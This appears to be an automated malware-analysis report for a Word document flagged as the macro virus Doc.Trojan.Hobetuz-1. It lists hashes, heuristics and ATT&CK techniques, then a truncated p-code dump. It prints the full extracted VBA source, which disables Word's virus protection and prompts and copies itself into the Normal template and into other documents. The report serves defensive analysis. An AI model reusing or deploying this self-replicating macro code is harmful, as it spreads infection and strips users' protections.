Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2b82b0e62f933c30…

MALICIOUS

Office (OLE)

26.5 KB Created: 1980-01-11 07:15:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 9f91e8106cdbfd5d48c699a3eef6ab64 SHA-1: faf19cc78d54a9cc51b52e6ccc4109b29d5f00e5 SHA-256: 2b82b0e62f933c301c77a0840c07c4db482a1cebfe927765cc6176cc09a1e609
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically AutoOpen and AutoClose, which are designed to execute automatically when the document is opened or closed. The script attempts to copy its code into the Normal template, a common technique for establishing persistence. The ClamAV detection 'Doc.Trojan.Hobetuz-1' further supports the malicious nature of this file.

Heuristics 5

  • ClamAV: Doc.Trojan.Hobetuz-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hobetuz-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5349 bytes
SHA-256: 64f9258293846cc2c283b3b245f51eb92b648d044a0ec14920409627adc5c147
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

Sub AutoOpen()
   On Error GoTo Salir
   Dim LineasPlantilla As Integer, LineasDoc As Integer
   
   Options.VirusProtection = False: Options.SaveNormalPrompt = False: Options.ConfirmConversions = False
   LineasDoc = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
   LineasPlantilla = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
   If LineasPlantilla > 10 And LineasDoc > 10 Then GoTo Salir
   If LineasPlantilla < 10 Then
      ActiveDocument.VBProject.VBComponents.Item(1).Name = NormalTemplate.VBProject.VBComponents.Item(1).Name
      NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
      NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 3, "Sub AutoClose()"
   Else
      If LineasDoc = 0 Then
         ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
         ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
         ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 3, "Sub AutoOpen()"
      End If
   End If
   If (Len(ActiveDocument.Name) > 20) Then MsgBox "I'm sorry, you gotta virus", 48, "(======Hobetuz======)  ;-)"
Salir:
End Sub

' Processing file: /opt/analyzer/scan_staging/3d6fdeb51d9c46a0b4c5546a1e434cb8.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 2621 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' Line #2:
' 	FuncDefn (Sub AutoOpen())
' Line #3:
' 	OnError Salir 
' Line #4:
' 	Dim 
' 	VarDefn LineasPlantilla (As Integer)
' 	VarDefn LineasDoc (As Integer)
' Line #5:
' Line #6:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' 	BoS 0x0000 
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' 	BoS 0x0000 
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #7:
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St LineasDoc 
' Line #8:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St LineasPlantilla 
' Line #9:
' 	Ld LineasPlantilla 
' 	LitDI2 0x000A 
' 	Gt 
' 	Ld LineasDoc 
' 	LitDI2 0x000A 
' 	Gt 
' 	And 
' 	If 
' 	BoSImplicit 
' 	GoTo Salir 
' 	EndIf 
' Line #10:
' 	Ld LineasPlantilla 
' 	LitDI2 0x000A 
' 	Lt 
' 	IfBlock 
' Line #11:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd New 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemSt New 
' Line #12:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromString 0x0001 
' Line #13:
' 	LitDI2 0x0003 
' 	LitStr 0x000F "Sub AutoClose()"
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' Line #14:
' 	ElseBlock 
' Line #15:
' 	Ld LineasDoc 
' 	LitDI2 0x0000 

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.